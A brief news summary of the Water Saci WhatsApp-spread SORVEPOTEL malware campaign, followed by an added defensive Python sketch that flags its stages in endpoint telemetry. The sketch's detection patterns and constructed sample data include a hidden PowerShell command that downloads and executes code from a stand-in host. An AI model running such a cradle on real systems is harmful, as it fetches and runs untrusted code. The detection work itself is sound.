Water Saci Hackers Leverage WhatsApp to Deliver Multi-Vector Persistent SORVEPOTEL Malware

Source: Cyber Security News

The Water Saci campaign identified by Trend Micro involves sophisticated malware that exploits WhatsApp to spread quickly among users. First noted in September 2025, it has evolved, utilizing a script-based attack chain that departs from traditional .NET patterns. The malware automatically sends malicious ZIP files to WhatsApp contacts, drastically increasing its infection potential.

The infection starts when users extract ZIP archives containing a VBS downloader, which initiates fileless execution via PowerShell. SORVEPOTEL’s dual-channel communication architecture distinguishes it from conventional threats: it retrieves commands over IMAP, which keeps its command-and-control operations resilient. The malware can execute over twenty commands, offering extensive remote access capabilities that pose substantial risks, especially to Brazilian financial institutions and enterprises.
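As an added, defender-side illustration (not code from the article or from Trend Micro's report), the sketch below triages constructed endpoint telemetry for the three stages the summary names: a script host spawning PowerShell, a hidden in-memory download cradle, and IMAP traffic from a process that is not a mail client. The event field names, the mail-client allow-list and the sample values are all assumptions.

```python
from dataclasses import dataclass

IMAP_PORTS = {143, 993}
MAIL_CLIENTS = {"outlook.exe", "thunderbird.exe"}      # assumed allow-list
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

@dataclass
class ProcEvent:          # assumed EDR process-creation shape
    pid: int
    image: str            # executable name, lower-case
    parent_image: str
    cmdline: str

@dataclass
class NetEvent:           # assumed EDR network-connection shape
    pid: int
    image: str
    dst_port: int

def is_vbs_to_powershell(ev: ProcEvent) -> bool:
    """Script host spawning PowerShell: the VBS downloader stage."""
    return ev.parent_image in SCRIPT_HOSTS and ev.image in POWERSHELL

def is_hidden_download_cradle(ev: ProcEvent) -> bool:
    """Hidden/bypass PowerShell pulling code into memory: the fileless stage."""
    c = ev.cmdline.lower()
    return (ev.image in POWERSHELL
            and any(k in c for k in ("-w hidden", "-windowstyle hidden", "-ep bypass"))
            and any(k in c for k in ("downloadstring", "invoke-expression", "iex", "-enc")))

def is_unexpected_imap_client(ev: NetEvent) -> bool:
    """IMAP from anything but a mail client: the command-retrieval channel."""
    return ev.dst_port in IMAP_PORTS and ev.image not in MAIL_CLIENTS

def triage(procs, nets):
    """Return (pid, reason) findings; one pid hitting all three is high confidence."""
    findings = [(p.pid, "vbs->powershell") for p in procs if is_vbs_to_powershell(p)]
    findings += [(p.pid, "hidden download cradle") for p in procs if is_hidden_download_cradle(p)]
    findings += [(n.pid, "non-mail IMAP client") for n in nets if is_unexpected_imap_client(n)]
    return findings
# Constructed sample telemetry, not real logs from the campaign.
SAMPLE_PROCS = [
    ProcEvent(100, "wscript.exe", "explorer.exe", r'wscript.exe "C:\Users\u\Downloads\invoice.vbs"'),
    ProcEvent(101, "powershell.exe", "wscript.exe",
              "powershell -w hidden -ep bypass -c IEX((New-Object Net.WebClient).DownloadString('http://example.invalid/p'))"),
    ProcEvent(102, "powershell.exe", "explorer.exe", "powershell -c Get-Process"),
]
SAMPLE_NETS = [NetEvent(101, "powershell.exe", 993), NetEvent(200, "outlook.exe", 993), NetEvent(201, "chrome.exe", 443)]
```

Correlating the three reasons on one pid (101 in the sample) separates the chain from a lone administrator PowerShell session, which fires none of them.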

👉 Read the original: Cyber Security News